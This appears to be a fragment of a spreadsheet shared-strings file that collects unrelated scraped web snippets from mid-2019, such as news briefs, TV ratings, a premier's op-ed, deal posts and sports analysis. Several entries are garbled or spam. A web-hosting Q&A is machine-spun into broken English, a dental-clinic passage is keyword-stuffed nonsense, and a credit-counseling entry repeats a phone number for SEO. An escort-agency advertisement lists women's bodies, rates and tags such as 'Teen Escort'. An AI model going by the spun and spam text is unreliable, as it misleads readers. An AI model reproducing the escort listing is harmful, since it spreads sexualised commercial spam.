    <t>Yiannakis50</t>
  </si>
  <si>
    <t>Promo code is valid on orders over $60 until midnight 21st Aug 2019. Excludes shipping. Cannot be used with any other coupon offer. For all terms visit tinyme.com/help</t>
  </si>
  <si>
    <t>Report: Top 20 Consolidated 7 Programs Channels: All Free-to-Air Market: 5 City Metro (aggregate figure) Demographics: Total People Day-part: 02:00 – 26:00 Day: Tuesday Date: 16/07/2019 Deliverable: Consolidated 7 v Overnight Rank Description (grouped) Channel\Network Consolidated 7 Overnight Increase 000s 1 SEVEN NEWS Seven Network 1,113,000 1,109,000 4,000 2 SEVEN NEWS / TODAY TONIGHT Seven Network 1,058,000 1,050,000 8,000 3 AUSTRALIAN NINJA WARRIOR -TUE Nine 950,000 868,000 82,000 4 NINE NEWS 6:30 Nine 923,000 921,000 2,000 5 NINE NEWS Nine 893,000 892,000 1,000 6 A CURRENT AFFAIR Nine 798,000 787,000 11,000 7 HOME AND AWAY Seven Network 738,000 700,000 38,000 8 MASTERCHEF AUSTRALIA TUES Network 10 696,000 648,000 47,000 9 HOUSE RULES – TUE Seven Network 677,000 609,000 68,000 10 THE CHASE AUSTRALIA Seven Network 637,000 635,000 2,000 11 ABC NEWS-EV ABC 625,000 624,000 1,000 12 HOT SEAT Nine 500,000 499,000 2,000 13 7.30-EV ABC 498,000 496,000 2,000 14 ANDREW DENTON: INTERVIEW Seven Network 492,000 439,000 53,000 15 THE PROJECT 7PM Network 10 484,000 481,000 3,000 16 MURDER, LIES &amp; ALIBIS Nine 431,000 400,000 30,000 17 STARGAZING: MOON AND BEYOND-EV ABC 382,000 359,000 23,000 18 10 NEWS FIRST Network 10 382,000 382,000 1,000 19 THE CHASE AUSTRALIA-5PM Seven Network 375,000 374,000 2,000 20 BLUEY-AM ABCKIDS/COMEDY 336,000 189,000 147,000 © OzTAM Pty Limited 2019. The Data may not be reproduced, published or communicated (electronically or in hard copy) without the prior written consent of OzTAM.</t>
  </si>
  <si>
    <t>AsianJournal</t>
  </si>
  <si>
    <t>By Premier John Horgan Earlier this month, I visited Welcome House, a place of refuge for people who are new to B.C. Welcome House provides housing, child care, a medical clinic, free English classes, and support for people who have experienced trauma, all under one roof. Many of the families who use the services at Welcome House have never known a home that is welcoming. Many were born in refugee camps, their families forced to flee because of persecution or violent conflict. Because of this, many refugees arrive without personal belongings or a plan for settlement. Through Welcome House, Immigrant Settlement Services BC and its partners provide wrap-around services to help families start a new life and make B.C. their permanent home. When I arrived at Welcome House, I was greeted by a family that had recently arrived in B.C. from Iran. They had fled Iran because of the religious persecution they experienced and spent 5 years in a refugee camp before coming to Canada. I was moved when one of the sons handed me a bouquet of flowers. He thanked me, and all British Columbians, for welcoming him and his family to the province. I told him that after all he had been through in his young life, I was proud to welcome him to his new home where he and his family can start a new life. We are facing the largest displacement crisis in history. More than 68 million people around the world are refugees. More than half are under the age of 18. Many have experienced loss and trauma. While others seek to build walls, our government is bringing down barriers. At a time when other jurisdictions are cutting back support for refugees and newcomers, our government is making different choices. B.C. is investing up to $6 million per year, over the next three years, to improve settlement and employment supports for newcomers. This funding includes more support for refugees seeking asylum, which was increased from $500,000 to $1.5 million. With $6 million in funding support from the federal government, we are also working to identify sustainable solutions for asylum seekers in need of temporary housing. Welcome House also provides services to new immigrants. Although each person’s pathway to arrival is different, immigrants generally leave their home country by choice. Many immigrants arrive in B.C. with valuable education, skills and experience earned outside of Canada that is not always recognized. Our government recently expanded the Career Paths for Skilled Immigrants program, to help skilled newcomers find work that matches their professional experience. This includes helping people get their credentials assessed and providing services like language training. To build a more inclusive and just society, and to make sure every person is treated with dignity and respect, our government re-established a human rights commission. The former commission was dismantled in 2002. The commissioner will address issues of discrimination and combat widespread patterns of inequality in society. Refugees and immigrants enrich our province. They are community leaders, public servants, volunteers and entrepreneurs, making B.C.’s communities stronger, more diverse, compassionate and resilient. Together, we can build a more inclusive province, where everyone has the opportunity to build a better future.</t>
  </si>
  <si>
    <t>Brenden Purdy</t>
  </si>
  <si>
    <t>"I'm honestly happy to turn the page," the Team Saskatoon captain said.</t>
  </si>
  <si>
    <t>I wanna take this to the beach and make a moat of cats around me to stop loud, aggressive people from encouraging their loud, aggressive dogs from jumping all over my Zen. Meow, fuckers.</t>
  </si>
  <si>
    <t>Accountants Nicole and Ian Reedman are excited to be moving into their new apartment in New Farm this weekend.</t>
  </si>
  <si>
    <t>Chloe Hart</t>
  </si>
  <si>
    <t>Robbie Farah thought his NRL career was on the scrapheap as he contemplated retirement not so long ago, but now the Wests Tigers great finds himself preparing for his 300th first grade match.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. South Bend, Indiana Consumer Credit Counseling Service | (888) 551-1270 Wednesday 24 July 2019 08:52 AM UTC-05 | Tags: south-bend-indiana-consumer-credit-counseling-service-888-551-1270 https://youtu.be/FB-IX3hUyCk South Bend, Indiana Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Wage Garnishment and Vehicle Repossession solutions, Mortgage Loan Modification, and Debt Settlement through chapter 13. South Bend, Indiana Credit counseling (888) 551-1270 starts with the parent and may include intermediaries later in life empowered by the individual debtor to act on their behalf to negotiate with creditors and resolve debt that is beyond a debtor's ability to pay. Credit counseling is a generic name and is not a brand name owned or controlled by any agency or company. South Bend, Indiana Consumer credit counseling services (888) 551-1270 are provided by attorneys, accountants, finance and tax professionals, for-profit, and non-profit credit counseling companies. Regulations on credit counseling and credit counseling agencies varies by country and sometimes within regions of the countries themselves. In South Bend, Indiana individuals filing Chapter 13 bankruptcy are required to receive counseling from a designated credit counseling agency. https://www.youtube.com/channel/UCxYQ8mN8hh7nfDFkGi3E_2w/about https://t.co/JqMKB0967s — Texas Consumer Credit Counseling Service (@GeneroSebastian) July 17, 2019 https://twitter.com/GeneroSebastian/status/1151303420424273920 Tags: south-bend-indiana-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/07/23/the-planetary-societys-crowdfunded-lightsail-2-deploys-its-solar-sail-in-orbit/ The Planetary Society’s crowdfunded LightSail 2 deploys its solar sail in orbit Crowdfunded spacecraft LightSail 2 is making good on its name, after successfully unfurling its solar sail in orbit so that it can begin propelling itself using the force of light alone. The sail’s Mylar surface reflects photons from the Sun, accumulating velocity gradually thanks to the additive effect of countless sub-atomic impacts. The team confirmed sail deployment initiated at 11:47 AM PT (2:47 PM ET), and full sail deployment completed at 11:50 AM PT (2:50 PM ET). LightSail 2 got its ride to space with the Falcon Heavy launch on June 25, sharing a ride with a variety of payloads, including NASA and Air Force experiments. The spacecraft is the product of The Planetary Society, a nonprofit organization devoted to the advancement of space exploration that’s led by Bill Nye . Its goal is to study solar sailing in practice — a technology whose conception goes back centuries, but whose actual field use is extremely limited, with only a few examples existing previously, including JAXA’s IKAROS mission from 2010. The sail’s total propulsion power is astonishingly small, despite its size (it’s about the size of a boxing ring) — it provides about as much power as a housefly landing on your hand. But it also will never theoretically run out of fuel, and can gradually increase its speed over time to very high velocities thanks to the friction-free environment of the vacuum of space. “Things are great, things are nominal,” explained The Planetary Society’s chief scientist, Bruce Betts, on a live stream of the sail’s deployment, indicating that everything is to plan so far. The Planetary Society will attempt to get back images from the deployment the next time the craft is within range of a ground station, and we’ll update when those become available. Source: https://techcrunch.com/2019/07/23/the-planetary-societys-crowdfunded-lightsail-2-deploys-its-solar-sail-in-orbit/ The post The Planetary Society’s crowdfunded LightSail 2 deploys its solar sail in orbit appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Best Walk-in Clinics in Vaughan, ON – Team Maple Walk-in Clinic, Major Mackenzie Medical Centre, Northtown Medical Clinic, Atlas Medical Clinic, Health Centre Of Maple, York Medical, Medical Walk-in, Venice Medical Centre, Vaughan Health Clinic, With a $1 million nest egg, you could settle comfortably in fairytale Seville; friendly Valencia. You may choose to rent. Impressions Dental, in Vaughan, ON, is a modern clinic of Family and Cosmetic Dentistry. This Vaughan dental care clinic offers exceptional procedures, including veneers, dental implants, sedation, endodontics, orthodontics, Highest Rated Dentist Near Vaughan Number 1 Dentist Near Vaughan Dentist Vaughan 1 review that is not currently recommended Is this your business? Once you’ve claimed, you can: Immediately update business information. Toronto Maple Leafs star Mitch Marner remains unsigned as he prepares to host a charity event this week near the city. . Top Dental Clinic Near Vaughan Ontario Our dental office proudly serves the Vaughan, Woodbridge, Maple and Richmond Hill areas offering general dentistry, The clinic provides a wide range of dental services – everything from routine dental visits and teeth whitening, to dental implants and dentures. Emergency dental at $1,000, for example. Not only is the SafetyWing website cool and user-friendly, with a straightforward. Global Dental Orthodontic Wax Market Research to Make Great Impact in Near Future by 2019-2029 – Dental orthodontic wax is widely used in dental clinics since it is suitable for patients wearing. Due to its ease and.</t>
  </si>
  <si>
    <t>Plans for your Trip to Japan? The post Plans for your Trip to Japan? appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>taransaini</t>
  </si>
  <si>
    <t>Ozgameshop still have limited stock available for Fire Emblem Three Houses Limited Edition for Nintendo Switch.If anyone missed Australian Limited edition they can get EU version which i think is far better than AU release version. Hope this will help someone.You can make it more cheap if anyone have reward points to be redeemed and also don't forget to use Cashrewards for 1.4% back. Fire Emblem Three Houses Limited Edition Includes: Fire Emblem Three Houses Game Steelbook Artbook Sound Selection USB Stick Three Houses Pin Badge Set</t>
  </si>
  <si>
    <t>Basic English Hebrew dictionary. Covers the most used words and is ideal for students or businessman. Translate Text English Hebrew Dictionary – PDF Download Republished by Blog Post Promoter</t>
  </si>
  <si>
    <t>Video footage captures the moment a nine-year-old girl is hurled into the air when a bull bison charges at a group of tourists at Yellowstone National Park in the United States.</t>
  </si>
  <si>
    <t>Oliver Jackson</t>
  </si>
  <si>
    <t>This Summer Saucony has worked with Bleu De Paname to create a French workwear inspired Azura ST. The collaboration celebrates the 10 year anniversary of Bleu De Paname through the historical lense of the Azura ST which first launched in 1998. Featuring a grey upper, blue denim elements, white mesh, ecru laces and notes of”orange […]</t>
  </si>
  <si>
    <t>Lindsey Hamilton</t>
  </si>
  <si>
    <t>Dundee’s latest hotspot is offering sex in the city – and has 50 shades of a blockbuster film about it.</t>
  </si>
  <si>
    <t>MagicMushroom</t>
  </si>
  <si>
    <t>Ozbargain's favourite noise-cancelling headphone, available in black and silver. Original Coupon Deal</t>
  </si>
  <si>
    <t>Of the UK’s four major mobile operators, EE was first to switch on its next-generation 5G network at the end of May, with Vodafone following in early July. We’re anticipating an August Three launch but, until now, O2 had remained largely silent on the matter. In tandem with the announcement of its H1 financial results O2 has now confirmed that it will begin its 5G rollout in October 2019, promising that 20 towns and cities will see 5G by the end of the year, and 50 by summer 2020. The first areas to benefit from O2 5G will be areas of Belfast, Cardiff, Edinburgh, London, Slough and Leeds. Later in the year the connectivity will stretch to Blackpool, Bournemouth, Bristol, Coventry, Derby, Eton, Guildford, Leicester, Lisburn, Norwich, Nottingham, Reading, Stoke and Windsor. By summer 2020 we’ll also see O2 5G in Aberdeen, Bradford, Brighton, Birkenhead, Birmingham, Cambridge, Glasgow, Hove, Kingston, Liverpool, Luton, Manchester, Milton Keynes, Newbury, Newcastle, Northampton, Plymouth, Portsmouth, Sheffield, Southampton, Sunderland, Warrington and Wolverhampton. O2 customers will be able to buy the Samsung Galaxy S10 5G from 8 August, and the Xiaomi Mi Mix 3 5G, which is currently a Vodafone exclusive, later in that month. A handful of other 5G phones have already gone on sale in the UK, with more expected later this year, and O2 will be announcing more compatible handsets and its 5G tariffs nearer the time. For now the company has said that those on its custom plans will have flexibility to move to 5G at any time. Those who want to carry on using their existing 4G handset will be able to trade them in after the rollout for a 5G phone. Notably O2 shares its network with various smaller operators in the UK, including GiffGaff, Sky Mobile, Tesco Mobile and Lyca Mobile, so we expect that these operators will begin offering 5G at the same time. 5G is up to 20 times faster than 4G, promising near-instant movie downloads and uninterrupted 4K streaming. The next-gen standard also offers much lower latency. For a full explanation of what this all means see our guide to what is 5G. You’ll also like: Best 5G Phone Deals Source link</t>
  </si>
  <si>
    <t>A radical rebuild of Colindale tube station on the Northern line has been approved by Barnet Council. The old “shed” of a ticket hall will be demolished, and completely new station building with an substantially enlarged ticket hall – around double the size of the existing space. Although it be surrounded on both sides by two tall towers, the station itself will be freestanding, and the design, by BDP of the curved wooden roofline takes its inspiration from early aircraft design at the nearby Hendon Aerodrome. The station will be built on a new slab over the rail tracks, allowing for the existing bridge-parapet to be removed and the pavement in front of the station widened. A total of £5 million in funding from TfL’s Growth Fund has been allocated for the new station building with step-free access and new pedestrian and cycle links. The project will cost in total some £22 million, so the remainder of the cost comes from the housing development. The new ticket hall will come with nine ticket barriers (compared to 5 at the moment), and the introduction of step-free access to platform level with the provision of a new lift, which will sit between the two existing staircases down to the platform level. The upgrade will also be good news for the nearby RAF Museum. As well as the modernisation of Colindale Tube station, the proposals also include the creation of more than 300 new homes around the station site, of which half will be affordable housing. Although planning is granted, TfL is currently reviewing the applications to build the development, so work on the new station is unlikely to start until 2021, with completion of the station rebuild in 2022. The proposals are also subject to approval from the Mayor of London. Colindale station was built as part of the 1923-4 extension of the second section of the underground railway to Edgware, and opened on 18th August 1924 The original building had been designed by Stanley Heaps, who had been employed as assistant to Leslie Green under the Underground Electric Railways Company of London (UERL). It was designed, as were many of the new stations on this stretch of line, in a Neo-Classical Style utilising features such as stone colonnades. These were intended to inspire the character of the of suburban dwellings within the vicinity of the station. At the time of its construction Colindale was still largely open fields and the arrival of the railway spurred significant development in this part of north London. Badly damaged during WW2, the station was rebuilt in the mid-1960s as part of a wider development. The 1960’s development above the underground station, ‘Station House’, was demolished c.2010, The station access remained and was remodelled and re-clad c.2015 which is the structures current form. And now, it’s about to embark on it’s fourth stage in its life.</t>
  </si>
  <si>
    <t>Welcome to escorts in Filton BS7, covering the whole area of Gloucestershire. We have escorts serving the flats, homes and local hotels in Filton and the surrounding Gloucestershire areas. Filton Escort Gloucestershire Escort Services Filton Escorts - Girls Who Know How to Fulfill You in Gloucestershire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Filton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Escort agencies in the Gloucestershire area are all very professional, and the quality of services provided by them is quite high. There is quite a lot of competition in the industry today, because of which you will get the benefit of choosing from some of the best agencies and some of the best escorts around. These agencies are all legal, and there is a massive demand for these ladies among the men who travel to the area. Men are looking for companionship from Filton escorts who are professional, pleasant and good looking and you would find many girls in the area who provide you just that. You don’t even have to spend a large amount of money to get their services since the agencies offer the companionship of these women at very reasonable rates today. Escorts in Filton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Filton,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Patience Location: Filton (BS7 0) Nationality: English Spoken Language: English, French Age: 19 years old Weight: 63.6kg (140lb) (10st - 0lb) Height: 5 feet 4 inches (162.56cm) Dress Size: S Shoe Size: 42 Hair Leigh: Very long Hair Color: Black Eye Color: Amber Breast: Natural Breast Size: C Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Filton Outcall: Gloucestershire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Patience Escort Name: Queenie Location: Filton (BS7 0) Nationality: American Spoken Language: English, French Age: 26 years old Weight: 52.7kg (116lb) (8st - 4lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 42 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: No Availability Area: Filton Outcall: Gloucestershire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Queenie Escort Name: Anya Location: Filton (BS7 0) Nationality: Argentine Spoken Language: English, Czech Age: 21 years old Weight: 57.3kg (126lb) (9st - 0lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 36 Hair Leigh: Very Long Hair Color: Black Eye Color: Violet Breast: Silicone Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Filton Outcall: Gloucestershire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Anya Escort Name: Radinka Location: Filton (BS7 0) Nationality: Icelandic Spoken Language: English, Latvian Age: 32 years old Weight: 63.6kg (140lb) (10st - 0lb) Height: 5 feet 4 inches (162.56cm) Dress Size: L Shoe Size: 37 Hair Leigh: Very Short Hair Color: Red Eye Color: Blue Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Filton Outcall: Gloucestershire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Radinka [ Escort Name: Taylor Location: Filton (BS7 0) Nationality: Indian Spoken Language: English, French Age: 27 years old Weight: 60.9kg (134lb) (9st - 8lb) Height: 5 feet 11 inches (180.34cm) Dress Size: L Shoe Size: 37 Hair Leigh: Long Hair Color: Red Eye Color: Green Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: No Drinking: No Availability Area: Filton Outcall: Gloucestershire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Taylor Escort Name: Karen Location: Filton (BS7 0) Nationality: English Spoken Language: English, Spanish Age: 18 years old Weight: 45.5kg (100lb) (7st - 2lb) Height: 5 feet 4 inches (162.56cm) Dress Size: M Shoe Size: 40 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: Filton Outcall: Gloucestershire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Karen Escort Name: Simone Location: Filton (BS7 0) Nationality: British Spoken Language: English, Icelandic Age: 29 years old Weight: 64.1kg (141lb) (10st - 1lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 41 Hair Leigh: Long Hair Color: Brunette Eye Color: Amber Breast: Natural Breast Size: F Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Filton Outcall: Gloucestershire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Simone Filton Indian Escort, Filton Indian Escort, Filton Scottish Escort, Filton Gay Escort, Filton Mature Escort, Filton Spanish Escort, Filton French Escort, Filton Black Escort, Filton Irish Escort, Filton Massage Escort, Filton Teen Escort, Filton British Escort, Filton Walsh Escort, Filton Bisexual Escort, Filton Young Escort, Filton Ebony Escort, Filton Independent Escort, Filton Brazilian Escort, Filton Best Escort, Filton Cheap Escort, Filton Porn Escort, Filton Outcall Escort, Filton Asian Escort, Filton Brunette Escort, Filton Male Escort, Filton Blonde Escort, Filton Agency Escort, Filton Polish Escort, Filton Busty Escort, Filton Erotic Escort, Filton Incall Escort, Filton Female Escort, Filton Horny Escort, Filton Chinese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Filton appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>via …much like my patience with the scale.</t>
  </si>
  <si>
    <t>I am a Logistics &amp; Supply chain professional with 6 years of experience in retail sector. I am currently seeking job opportunities in the following fields for IMMEDIATE START Warehousing Inventory Controller Logistics – Analyst / Supervisor / Shipment Management Supply Chain – Analyst / Order Management / .. Read more</t>
  </si>
  <si>
    <t>Nearly the exact opposite to WordPress Weebly web sites would be indexed by the search engines the same as other internet sites. You can examine this Weebly article on how to validate your Weebly website with search-engines I purchased my domain it up with WordPress, as there is more foot traffic there through you guys and set. I became modifying my web site with wordpress after which We saw back at my web site ground account that the Sitebuilder can be used by me to create my web site free of charge. We clicked the key and I was taken by it to weebly, where We started to produce a website. I quickly thought i will stop and get. When I create my site the means we want with all the web web site builder, just how do I have it to my wordpress? Is the fact that possible? have always been I able transfer it over totally? If We click publish on weebly, what the results are to my wordpress site? A web page which you have actually developed in Weebly may not be relocated to WordPress. It needs to stay static in Weebly. The 2 platforms aren’t linked. But never worry; unless you push on to create your website on Weebly, your site that is current wo be changed. After you publish it nevertheless, your WordPress website should be overwritten. So be mindful. we have been from shoutscoop com and now we are utilizing siteground affiliate system . Is it possible to verify, did you offer domain that is free for a lifetime . Yes, customers who buy web hosting from us, get to select a domain title at signup. All popular domain name extensions are free and renewed for free for as long as the hosting account remains active as part of a special promotion. For a few country-specific or domain that is specialized we now have other promotions. We created an online site through SiteGround and Weebly expansion. After setuping my pages in Weebly, we pubished it but I am able to just start to see the page that is 1st. How do we come across one other pages ? (other have actually WordPress errors): Please, available a solution in your Help Desk and my peers will further assist you! My newly created weebly web web site just isn’t overwriting WordPress. so my created web site will not arrive but a blank wordpress 2016 theme “page not discovered” does with my domain. Please assistance! Please, upload a solution in your Help Desk and our help will further assist you. the weebly “App Center” does is certainly not supported in SiteGround?? The App Center, being a development that is relatively new of, continues to be unavailable through 3rd events. An estimate is had by us from Weebly so it should take place in Q1 2017. Hello, are you able to have two languages for a niche site within the database? Hi Dan, this article was found by me in the topic However please note that you need to look into choice 2 which doesn’t include utilizing the Weebly App Center. The App Center, as a reasonably brand new growth of weebly, continues to be not available through 3rd events like SiteGround. Please contact our help team to get more assistance. We intend on making use of types on my Weebly site, but there is howevern’t a Captcha option available. We heard that JotForm application might be a choice, how to repeat this? Spam site builders rank inc is impractical to weed through with kind information. Hi Brian, please publish an admission to the help group as well as will explore that. I am attempting to include a WordPress template to my web web web site through Weebly however for every template I take to an error is got by me message that there is no html page when you look at the upload. How do this be a challenge once I’m obtaining the straight that is template the WordPress web web site? Can somone please assist me? So that you can make use of WordPress theme, you need to utilize WordPress, perhaps perhaps perhaps not Weebly. Weebly have actually their very own themes. If i’ve a GrowBig account, am I able to host multiple Weebly websites each due to their very own website name without updating Weebly? There must be no presssing problem with that. Simply allow the Weebly sitebuilder for every domain you wish to put it to use for. If you encounter any difficulties, please speak to our help group. I build a niche site on wix.com, may I subscribe to a SG fundamental account and have my content from wix transmitted over? I will be afraid that there’s no real solution to migrate your articles from Wix. You essentially need to manually copy/paste this content right into a CMS you need to have on your own web web web hosting account with us. Can there be any news or perhaps a timeline on whenever immediate access to weebly editor can be available? Rather than being forced to undergo SG back-end. Hi Julius, we will implement it in Q1 2017. Great news, thanks. I will be looking out ! Iskra, had been the access/login that is direct Weebly accomplished? I can not learn how to offer my customer use of her web site that we designed with the Sitebuilder. There is a “Members” tab nonetheless it appears like that is simply for outside users for the internet site, maybe maybe not for modifying purposes. Regrettably, signing directly into Weebly nevertheless requires going right through the SiteGround customer Area. I’m able to reassure you that we’ve been earnestly focusing on completely new interfaces for the customers plus one of the numerous advantages they’re going to bring is specifically the direct Weebly login. We aspire to have the ability to introduce them within the next months that are few.</t>
  </si>
  <si>
    <t>Tegan Guthrie</t>
  </si>
  <si>
    <t>A three-month trial of reycling in the City has wrapped up. Tonight, councillors will vote on the next move</t>
  </si>
  <si>
    <t>Matt Loberstein</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V This is how to boost your Amazon Prime Day sales! It’s not too late. Instagram: @mattloberstein Product Research Guide video: … source</t>
  </si>
  <si>
    <t>Check out the companies making headlines before the bell: Boeing – Boeing lost an adjusted $5.82 per share for the second quarter, as it deals with issues related to the 737 Max grounding. The commercial aviation unit lost nearly $5 billion in the second quarter, but the defense and services units posted profits. AT&amp;T – AT&amp;T matched Wall Street forecasts with adjusted quarterly profit of 89 cents per share, with revenue beating estimates. Growth in AT&amp;T’s wireless and media businesses helped make up for a loss of nearly one million pay-TV customers. Caterpillar – The heavy equipment maker earned $2.83 per share from the second quarter, compared to a consensus estimate of $3.12 a share. Revenue, however, was essentially in line with Street forecasts. UPS – UPS reported adjusted quarterly profit of $1.96 per share, four cents above estimates, with revenue above forecasts as well. Separately, UPS said it would offer 7-day delivery beginning in 2020. That follows a similar move by rival FedEx, which had announced a 2020 launch of 7-day service in May. Anthem – The health insurer came in 3 cents a share ahead of forecasts, with adjusted quarterly profit of $4.64 per share. Revenue also beat estimates and Anthem increased its full-year guidance as it raises the lower end of is projected membership growth. Hilton Worldwide – The hotel operated earned adjusted $1.06 per share for its latest quarter, 4 cents a share above estimates. Revenue also beat forecasts on steady travel demand in the U.S. Hilton raised its full-year earnings forecast, but also lowered the high end of its revenue per available room forecast range amid concerns about a slowing global economy. VF Corp. – The apparel maker beat estimates by a penny a share, earnings an adjusted 30 cents per share for the quarter. Revenue also exceeded forecasts and the company raised its full-year outlook, on upbeat growth for its Vans sneakers and North Face clothing. Snap – Snap lost 6 cents per share for its latest quarter, 4 cents a share less than analysts had anticipated. Revenue also topped forecasts, helped by its strongest user growth since it became a public company. Texas Instruments – Texas Instruments beat consensus forecasts by 7 cents a share, with adjusted quarterly profit of $1.29 per share. The chipmaker’s revenue came in above estimates as well. The stock is getting a boost from the results, especially in light of the company’s previous warning about a slowdown in demand that may last for a few more quarters. Visa – Visa reported adjusted quarterly profit of $1.37 per share, 5 cents a share above estimates. Revenue also beat consensus, helped by an overall boost in spending using Visa cards and highlighted by a nearly 9% jump in U.S. payment volume. Chipotle Mexican Grill – Chipotle earned an adjusted $3.99 per share for its latest quarter, beating the consensus estimate of $3.76. The restaurant chain’s revenue was also above estimates, and investors are especially encouraged by a much-stronger-than-expected 12% jump in same-restaurant sales. iRobot – iRobot shares are under pressure after the Roomba robot vacuum cleaner maker said tariffs resulting from the trade dispute between the U.S. and China will weigh on company results throughout this year. iRobot cut its full-year earnings guidance to a range of $2.40-$3.15 per share from the prior $3.15-$3.40 per share. Facebook, Amazon, Alphabet – These and other tech companies are on watch today, following an announcement by the Justice Department that it is opening a broad antitrust review of big tech firms. T-Mobile, Sprint — The proposed merger of T-Mobile and Sprint will be the subject of a leadership meeting today by Germany’s Deutsche Telekom, which owns 63 percent of T-Mobile. Separately, Bloomberg reports that Dish Network has agreed to pay $5 billion for wireless assets that T-Mobile and Sprint will sell to gain approval for the deal. Campbell Soup – Campbell is selling its Australian snacks unit Arnott’s to private equity firm KKR for a reported $2.2 billion. Starbucks — Starbucks is expanding its partnership with Uber’s Uber Eats service to deliver coffee and food throughout the U.S. beginning in early 2020. General Electric – GE has hired advisers to explore a sale of its aircraft financing unit, according to Bloomberg, which also reports that Starwood and Apollo Management have put in bids. GE CEO Larry Culp had said in January that he didn’t plan to sell the unit, which could fetch around $4 billion. READ SOURCE The post Stocks making the biggest moves premarket: Boeing, Caterpillar, AT&amp;T, UPS, Anthem, Snap &amp; more – CNBC appeared first on BusinessTelegraph.</t>
  </si>
  <si>
    <t>Russia and China have carried out their first long-range joint air patrol in North Asia, a mission that triggered hundreds of warning shots from South Korean jets, and a strong diplomatic protest from Japan.</t>
  </si>
  <si>
    <t>The Conservatives have been given a “Boris bounce” after electing their new leader, according to new polls. Read more? Click here</t>
  </si>
  <si>
    <t>The West Australian</t>
  </si>
  <si>
    <t>The future of Fremantle coach Ross Lyon remains a talking point after reports a section of St Kilda’s board wanted him back at the club. So where will he be next year?</t>
  </si>
  <si>
    <t>The men’s and women’s teams will face the best from North Queensland Football on August 17, and last night the invited players met at Endeavour …</t>
  </si>
  <si>
    <t>↻ Available now: https://www.toneden.io/dubloadz-2/post/billie-eilish-you-should-see-me-in-a-crown-dubloadz-remix ● Subscribe for more: http://bit.ly/TheDubRebellionYT → Dubloadz http://www.facebook.com/DubloadzOfficial Tweets by Dubloadz → Billie Eilish Tweets by billieeilish http://www.billieeilish.com/ https://www.instagram.com/wherearetheavocados/ https://www.facebook.com/billieeilish/ → The Dub Rebellion http://www.facebook.com/officialrebellion http://www.instagram.com/darekrebellion http://www.soundcloud.com/thedubrebellion1 Tweets by thedubrebellion http://www.discord.gg/thedubrebellion http://www.facebook.com/groups/737823163272960 http://www.thedubrebellion.bigcartel.com The post Billie Eilish – You Should See Me In A Crown (Dubloadz Remix) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Up to 40 jobs will be created when discount shop chain B&amp;M opens its third Dundee store, the company has confirmed.</t>
  </si>
  <si>
    <t>cliff harris is still a punk</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports Taking a look at how the Pittsburgh Steelers has changed, and will continue to change, in 2019. As training camp gets rolling, much attention will be paid to a transforming Steelers offense that will have to compensate for the loss of Antonio Brown. Talented as the mercurial Brown is, count me among those who believe his absence is a blessing in disguise. I am optimistic his production will be duplicated as Ben Roethlisberger spreads the football among a deep group of receivers and coordinator Randy Fichtner finds creative ways to use his promising young running backs. A more complex transformation has been at work on the other side of the ball for a few seasons now, as the defense has moved away from its reliance on a base 3-4 scheme towards more of a hybrid philosophy. This article examines that transformation and what it means for the coming campaign. One of the fundamental decisions any head coach or coordinator must make when assembling an offense or defense is whether to match their scheme to their personnel or their personnel to their scheme. “System” guys, meaning those who tend to match personnel to scheme, generally do so because they have a scheme they either know extremely well or they truly believe in (likely both). They trust it, they can coach it, and they fill their roster with players who can execute it. On offense, coaches who rely on a zone run game must find backs with patience, vision and good burst. Air Raid guys want agile linemen who can protect the quarterback. West Coast guys need a QB who can read defenses and get the ball out quickly. On defense, the 4-3 requires ends who can rush the passer and a tackling machine at middle linebacker. The 4-2-5 demands a multi-dimensional box safety who can run like a defensive back and tackle like a backer. Cover-3 needs a free safety with great range. Cover-2 corners must be able to press, run and tackle. On it goes. The advantage of building an offense or a defense around a scheme is that the familiarity coaches have with it allows them to know what works and what doesn’t work, how opponents will attack the scheme and how to counter their attack. Also, by finding players who can do what is required to make it successful, players are put into specific roles that maximize their abilities and increase their chance to succeed. What if you can’t find those players, however? Or what if those players are so suited to the specific schemes a coach wants to run that there is little flexibility when change is required? Therein lies the weakness of the scheme-first approach. This concern has relevance in Pittsburgh. Increasingly, as offenses have diversified and as football has become a more horizontally-based, pass-first game, the Steelers have found themselves hamstrung by their reliance on a base 3-4 defense. On the defensive front, they have lacked a true two-gapping nose tackle in the mold of 